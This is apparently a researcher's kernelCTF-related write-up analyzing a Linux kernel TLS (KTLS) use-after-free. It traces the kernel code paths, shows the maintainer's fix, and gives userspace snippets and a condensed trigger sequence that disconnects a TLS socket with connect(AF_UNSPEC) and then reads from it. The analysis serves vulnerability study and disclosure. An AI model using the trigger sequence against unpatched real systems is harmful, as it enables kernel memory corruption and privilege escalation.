There are several kernelCTF slots targeting the TLS subsystem. Since I had previously reviewed KTLS during my kernelCTF research on lts-6.6.71 and found nothing, I decided to analyze these slots and write up this post as side notes.

The patch commit for this vulnerability can be found here; the fix landed in LTS 6.6.88.

1. TLS Initialization

Through the SYS_setsockopt system call with the TCP_ULP socket option, an already-connected TCP socket can be configured to use an Upper Layer Protocol (ULP). One of the supported ULPs enabled by default is TLS.
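
From userspace, enabling the ULP takes a single setsockopt() call. A minimal sketch (enable_tls_ulp is a hypothetical helper name; error handling beyond perror() is omitted):

#include <stdio.h>
#include <netinet/tcp.h>
#include <sys/socket.h>

/* Switch an already-connected TCP socket over to the TLS ULP. After
 * this call, the socket's proto/proto_ops point to the TLS handlers. */
static int enable_tls_ulp(int sock)
{
    if (setsockopt(sock, SOL_TCP, TCP_ULP, "tls", sizeof("tls")) < 0) {
        perror("setsockopt(TCP_ULP)");
        return -1;
    }
    return 0;
}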

During the initialization of TLS, the proto [1] and proto_ops [2] fields of the TCP socket are updated to point to TLS-specific handlers.

static int tls_init(struct sock *sk)
{
    struct tls_context *ctx;
    int rc = 0;

    update_sk_prot(sk, ctx); // <--------------
    // [...]
}

void update_sk_prot(struct sock *sk, struct tls_context *ctx)
{
    int ip_ver = sk->sk_family == AF_INET6 ? TLSV6 : TLSV4;

    WRITE_ONCE(sk->sk_prot, // [1]
           &tls_prots[ip_ver][ctx->tx_conf][ctx->rx_conf]);
    WRITE_ONCE(sk->sk_socket->ops, // [2]
           &tls_proto_ops[ip_ver][ctx->tx_conf][ctx->rx_conf]);
}

After TLS is enabled, encryption parameters must be configured for both transmission and reception via the TLS_TX and TLS_RX options.
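
Both directions are configured with setsockopt() at the SOL_TLS level. Below is a minimal sketch for the receive side, loosely following the example in Documentation/networking/tls.rst (setup_tls_rx is a hypothetical helper; the zeroed key material is a placeholder, real values would come from a TLS handshake):

#include <string.h>
#include <linux/tls.h>
#include <sys/socket.h>

#ifndef SOL_TLS
#define SOL_TLS 282 /* not exported by all libc headers */
#endif

/* Configure AES-GCM-128 parameters for the receive path (TLS_RX).
 * Zeroed placeholders are enough to reach the kernel setup path,
 * including tls_strp_init() below. */
static int setup_tls_rx(int sock)
{
    struct tls12_crypto_info_aes_gcm_128 crypto_info;

    memset(&crypto_info, 0, sizeof(crypto_info));
    crypto_info.info.version = TLS_1_2_VERSION;
    crypto_info.info.cipher_type = TLS_CIPHER_AES_GCM_128;
    /* .key / .iv / .salt / .rec_seq left zeroed here */

    return setsockopt(sock, SOL_TLS, TLS_RX, &crypto_info,
                      sizeof(crypto_info));
}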

When setting up the receive path (TLS_RX), the kernel eventually calls tls_strp_init() [3], which allocates an anchor skb object. This skb is not used to store data; instead, it serves as a marker for TLS records and will be referenced when processing incoming packets.

static int do_tls_setsockopt(struct sock *sk, int optname, sockptr_t optval,
                 unsigned int optlen)
{
    // [...]
    switch (optname) {
    case TLS_TX:
    case TLS_RX:
        lock_sock(sk);
        rc = do_tls_setsockopt_conf(sk, optval, optlen, // <--------------
                        optname == TLS_TX);
        release_sock(sk);
        break;
    }
    // [...]
}

static int do_tls_setsockopt_conf(struct sock *sk, sockptr_t optval,
                  unsigned int optlen, int tx)
{
    struct tls_context *ctx = tls_get_ctx(sk);
    
    // [...]
    if (tx) {
    // [...]
    } else {
        if (/* [...] */) {
            // [...]
        } else {
            rc = tls_set_sw_offload(sk, ctx, 0); // <--------------
            // [...]
        }
        // [...]
    }
}

int tls_set_sw_offload(struct sock *sk, struct tls_context *ctx, int tx)
{
    if (tx) {
        // [...]
    } else {
        ctx->priv_ctx_rx = init_ctx_rx(ctx);
        // [...]
        sw_ctx_rx = ctx->priv_ctx_rx;
        // [...]
    }

    if (sw_ctx_rx) {
        rc = tls_strp_init(&sw_ctx_rx->strp, sk); // [3]
    }
}

int tls_strp_init(struct tls_strparser *strp, struct sock *sk)
{
    // [...]
    strp->sk = sk;
    strp->anchor = alloc_skb(0, GFP_KERNEL);
    // [...]
    return 0;
}

2. Packet Reception

When the device receives a packet, it travels up the network stack and is eventually handed to the TLS receive handler, tls_strp_read_sock(), for processing:

#0  tls_strp_read_sock
#1  tls_strp_check_rcv
#2  tls_data_ready
#3  tcp_data_queue
#4  tcp_rcv_established
#5  tcp_v4_do_rcv
#6  tcp_v4_rcv
#7  ip_protocol_deliver_rcu
#8  ip_local_deliver_finish
#9  __netif_receive_skb_one_core
#10 __netif_receive_skb
#11 process_backlog
#12 __napi_poll
#13 napi_poll
#14 net_rx_action
#15 handle_softirqs
#16 do_softirq

The implementation of tls_strp_read_sock() is somewhat complex, so I’ve added inline comments to explain what each function call does. If the incoming data belongs to the first packet of a TLS record, the function will call tls_strp_load_anchor_with_queue() [1].

static int tls_strp_read_sock(struct tls_strparser *strp)
{
    int sz, inq;

    inq = tcp_inq(strp->sk); // total unread packet data length
    if (inq < 1)
        return 0;

    // [...]
    if (inq < strp->stm.full_len) // strp->stm.full_len is 0 until the record header has been parsed
        return tls_strp_read_copy(strp, true);

    if (!strp->stm.full_len) {
        // the first packet in the record is used as the anchor
        tls_strp_load_anchor_with_queue(strp, inq); // [1]

        // extract TLS record size from the header
        sz = tls_rx_msg_size(strp, strp->anchor);
        
        // [...]
        // set the total expected length of TLS record
        strp->stm.full_len = sz;

        if (!strp->stm.full_len || inq < strp->stm.full_len)
            // not all data has been received yet
            return tls_strp_read_copy(strp, true); // decide whether to copy partial data
    }

    // [...]
    WRITE_ONCE(strp->msg_ready, 1); // a complete TLS record is ready
    tls_rx_msg_ready(strp);

    return 0;
}

The function tls_strp_load_anchor_with_queue() retrieves the first skb object [2] from the TCP receive queue and attaches it as a fragment list [3] to the anchor skb.

static void tls_strp_load_anchor_with_queue(struct tls_strparser *strp, int len)
{
    struct tcp_sock *tp = tcp_sk(strp->sk);
    struct sk_buff *first;
    u32 offset;

    first = tcp_recv_skb(strp->sk, tp->copied_seq, &offset); // [2]

    // [...]
    strp->anchor->len = offset + len;
    strp->anchor->data_len = offset + len;
    strp->anchor->truesize = offset + len;

    skb_shinfo(strp->anchor)->frag_list = first; // [3]
    // [...]
}

It is important to note that tcp_recv_skb() peeks at the skb object at the head of the receive queue [4] without taking a reference (skb->users is not incremented). This means TLS does not actually own this skb object; it is only borrowing it.

struct sk_buff *tcp_recv_skb(struct sock *sk, u32 seq, u32 *off)
{
    while ((skb = skb_peek(&sk->sk_receive_queue) /* [4] */) != NULL) {
        // [...]
        if (offset < skb->len || (TCP_SKB_CB(skb)->tcp_flags & TCPHDR_FIN)) {
            *off = offset;
            return skb;
        }
    }
}
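
To make the borrowing concrete: taking ownership would require bumping the refcount first, e.g. via skb_get(), which increments skb->users. The following variant is purely illustrative; it is neither what the code does nor what the upstream fix does:

/* Hypothetical ownership-taking variant: holding a real reference
 * would keep the skb alive across a later __skb_queue_purge() of
 * the receive queue. The actual code stores the bare pointer. */
skb_shinfo(strp->anchor)->frag_list = skb_get(first);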

3. Disconnection & Root Cause

In Linux, invoking the SYS_connect system call on an already-connected TCP socket with the address family set to AF_UNSPEC will actively disconnect the current connection [1] 🤯.
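
In other words, userspace can force a disconnect with nothing more than the following (a minimal sketch; force_disconnect is a hypothetical helper):

#include <string.h>
#include <sys/socket.h>

/* Disconnect an established TCP socket: connect() with AF_UNSPEC is
 * routed to __inet_stream_connect(), which calls
 * sk->sk_prot->disconnect() instead of starting a new connection. */
static int force_disconnect(int sock)
{
    struct sockaddr sa;

    memset(&sa, 0, sizeof(sa));
    sa.sa_family = AF_UNSPEC;
    return connect(sock, &sa, sizeof(sa));
}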

const struct proto_ops inet_stream_ops = {
    .family = PF_INET,
    // [...]
    .connect = inet_stream_connect, // <------------
    // [...]
};

int inet_stream_connect(struct socket *sock, struct sockaddr *uaddr,
            int addr_len, int flags)
{
    int err;

    lock_sock(sock->sk);
    err = __inet_stream_connect(sock, uaddr, addr_len, flags, 0); // <------------
    release_sock(sock->sk);
    return err;
}

int __inet_stream_connect(struct socket *sock, struct sockaddr *uaddr,
              int addr_len, int flags, int is_sendmsg)
{
    if (uaddr) {
        // [...]
        if (uaddr->sa_family == AF_UNSPEC) {
            sk->sk_disconnects++;
            err = sk->sk_prot->disconnect(sk, flags); // internally sets sk->sk_err to ECONNRESET (0x68)
            sock->state = err ? SS_DISCONNECTING : SS_UNCONNECTED; // [1]
            goto out;
        }
    }
}

However, even though the socket state is updated to SS_UNCONNECTED, the socket's proto and proto_ops handlers are not reverted and continue to point to the TLS implementations. In addition, the TCP disconnect handler does not release the TLS resources. Together, these inconsistencies form the root cause of the vulnerability.

As noted in the maintainer’s commit, fully supporting TLS disconnection is hard. Instead, the fix introduces a dedicated disconnect handler that simply disallows disconnects on TLS sockets.

+static int tls_disconnect(struct sock *sk, int flags)
+{
+    return -EOPNOTSUPP;
+}

static void build_protos(struct proto prot[TLS_NUM_CONFIG][TLS_NUM_CONFIG],
             const struct proto *base)
{
    prot[TLS_BASE][TLS_BASE] = *base;
    prot[TLS_BASE][TLS_BASE].setsockopt    = tls_setsockopt;
    prot[TLS_BASE][TLS_BASE].getsockopt    = tls_getsockopt;
+   prot[TLS_BASE][TLS_BASE].disconnect    = tls_disconnect;
    prot[TLS_BASE][TLS_BASE].close        = tls_sk_proto_close;
}

4. Vulnerability Trigger

So what happens if a TLS socket is forced to disconnect? Since the TLS proto originally defined no disconnect handler of its own, a disconnect falls through to the handler inherited from TCP, tcp_disconnect().

pwndbg> p sk->__sk_common.skc_prot->disconnect
$1 = (int (*)(struct sock *, int)) 0xffffffff822163e0 <tcp_disconnect>

During the execution of tcp_disconnect(), the kernel attempts to release all skb objects from the receive queue [1].

int tcp_disconnect(struct sock *sk, int flags)
{
    // [...]
    __skb_queue_purge(&sk->sk_receive_queue); // [1]
    // [...]
}

Internally, __skb_queue_purge() calls kfree_skb_reason() on each skb in the queue, which drops a reference (skb->users) and frees the skb via __kfree_skb() once the refcount reaches zero.

#0  __kfree_skb
#1  kfree_skb_reason
#2  __skb_queue_purge_reason
#3  __skb_queue_purge
#4  tcp_disconnect

The problem arises because the TLS receive handler stores the first skb from the TCP receive queue [2] as part of its internal state, but without updating its reference count. As a result, after tcp_disconnect() frees the queue, the TLS ->frag_list pointer ends up referencing a freed skb object.

static void tls_strp_load_anchor_with_queue(struct tls_strparser *strp, int len)
{
    // [...]
    first = tcp_recv_skb(strp->sk, tp->copied_seq, &offset);
    // [...]
    skb_shinfo(strp->anchor)->frag_list = first; // [2]
    // [...]
}

Later, if a system call such as SYS_recvfrom is made on this disconnected TLS socket, the handler tls_sw_recvmsg() is invoked. Deep inside, while converting the skb data into a scatterlist, the kernel traverses the fragment list [3] and dereferences the previously freed skb [4], leading to a use-after-free (UAF).

int tls_sw_recvmsg(struct sock *sk,
           struct msghdr *msg,
           size_t len,
           int flags,
           int *addr_len)
{
    // [...]
    while (len && (decrypted + copied < target || tls_strp_msg_ready(ctx))) {
        // [...]
        err = tls_rx_one_record(sk, msg, &darg);
        // [...]
    }
}

static int tls_rx_one_record(struct sock *sk, struct msghdr *msg,
                 struct tls_decrypt_arg *darg)
{
    // [...]
    err = tls_decrypt_sw(sk, tls_ctx, msg, darg);
    // [...]
}

static int
tls_decrypt_sw(struct sock *sk, struct tls_context *tls_ctx,
           struct msghdr *msg, struct tls_decrypt_arg *darg)
{
    // [...]
    err = tls_decrypt_sg(sk, &msg->msg_iter, NULL, darg); // <--------------
    // [...]
}

static int tls_decrypt_sg(struct sock *sk, struct iov_iter *out_iov,
              struct scatterlist *out_sg,
              struct tls_decrypt_arg *darg)
{
    struct sk_buff *skb = tls_strp_msg(ctx); // ctx->strp.anchor

    // [...]
    err = skb_to_sgvec(skb, &sgin[1], // <--------------
               rxm->offset + prot->prepend_size,
               rxm->full_len - prot->prepend_size);
}

int skb_to_sgvec(struct sk_buff *skb, struct scatterlist *sg, int offset, int len)
{
    // [...]

    skb_walk_frags(skb, frag_iter) { // [3]
        int end, ret;
    
        // [...]
        end = start + frag_iter->len; // [4]
        if ((copy = end - offset) > 0) {
            // [...]
            ret = __skb_to_sgvec(frag_iter, sg+elt, offset - start,
                          copy, recursion_level + 1);
            if (unlikely(ret < 0))
                return ret;
            elt += ret;
            if ((len -= copy) == 0)
                return elt;
            offset += copy;
        }
        start = end;
    }
    BUG_ON(len);
}

#define skb_walk_frags(skb, iter) \
    for (iter = skb_shinfo(skb)->frag_list; iter; iter = iter->next)

You can find the PoC here.
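
For orientation, here is a condensed sketch of the trigger sequence, reusing the hypothetical helpers from the snippets above (sock is a connected TCP socket; the peer's send must complete before the disconnect, and error handling is omitted):

char buf[256];

enable_tls_ulp(sock);            /* TCP_ULP = "tls"                  */
setup_tls_rx(sock);              /* SOL_TLS / TLS_RX                 */
/* peer sends a complete TLS record here, so tls_strp_read_sock()
 * stashes the borrowed skb in the anchor's frag_list               */
force_disconnect(sock);          /* tcp_disconnect() purges and
                                  * frees the receive queue          */
recv(sock, buf, sizeof(buf), 0); /* skb_to_sgvec() walks the freed
                                  * frag_list -> UAF                 */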

5. Others

During debugging, I observed that data sent in separate writes can still end up stored in the same skb object. This process is called coalescing. The corresponding call trace is shown below:

#0  skb_try_coalesce
#1  tcp_try_coalesce
#2  tcp_queue_rcv
#3  tcp_rcv_established
#4  tcp_v4_do_rcv
#5  tcp_v4_rcv

Under certain conditions, coalescing attempts to merge adjacent and compatible skb objects instead of allocating a new skb.
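
From the sender's perspective this is just two back-to-back writes (a minimal sketch; peer_sock is the peer's connected socket, and whether the receiver actually coalesces depends on timing and the layout of the first skb):

/* Two separate sends from the peer... */
send(peer_sock, "AAAA", 4, 0);
send(peer_sock, "BBBB", 4, 0);
/* ...may land in a single skb on the receiver if tcp_try_coalesce()
 * finds the second segment adjacent and compatible with the first. */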